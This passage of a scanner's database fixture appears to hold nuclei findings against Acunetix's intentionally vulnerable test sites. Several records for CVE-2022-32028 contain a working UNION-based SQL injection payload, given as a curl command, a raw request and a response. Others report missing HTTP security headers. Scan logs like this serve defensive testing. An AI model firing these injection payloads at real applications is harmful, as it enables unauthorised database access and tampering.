/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101 Firefox/50.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:05 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div><img src='/Mod_Rewrite_Shop/images/1.jpg'><b>c8c605999f3d8352d7bb792cf3fdb25b</b><br><br>4<br><a href='/Mod_Rewrite_Shop/BuyProduct-1/'>Buy</a>&nbsp;<a href='/Mod_Rewrite_Shop/RateProduct-1.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 315, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:06.559Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:05 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 316, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:07.944Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:07 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div><img src='/Mod_Rewrite_Shop/images/1.jpg'><b>c8c605999f3d8352d7bb792cf3fdb25b</b><br><br>4<br><a href='/Mod_Rewrite_Shop/BuyProduct-1/'>Buy</a>&nbsp;<a href='/Mod_Rewrite_Shop/RateProduct-1.html'>Rate</a></div><hr><a href='/Mod_Rewrite_Shop/'>Back</a>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 317, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.4.24' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:08.105Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.4.24\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:07 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 318, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/cves/2022/CVE-2022-32028.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/CVE-2022-32028", + "template_id": "CVE-2022-32028", + "matcher_name": "", + "name": "Car Rental Management System 1.0 - SQL Injection", + "severity": 3, + "description": "Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md', 'https://nvd.nist.gov/vuln/detail/CVE-2022-32028', 'https://github.com/ARPSyndicate/kenzer-templates']", + "cvss_metrics": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvss_score": 7.2, + "curl_command": "curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+", + "discovered_date": "2024-11-13T02:40:08.305Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183\r\nConnection: close\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:07 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> c8c605999f3d8352d7bb792cf3fdb25b</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 19, + 20, + 21, + 22, + 23, + 24, + 25 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 319, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:49.555Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 320, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:49.691Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 321, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:49.819Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 322, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:40:49.956Z", + "open_status": true, + "hackerone_report_id": 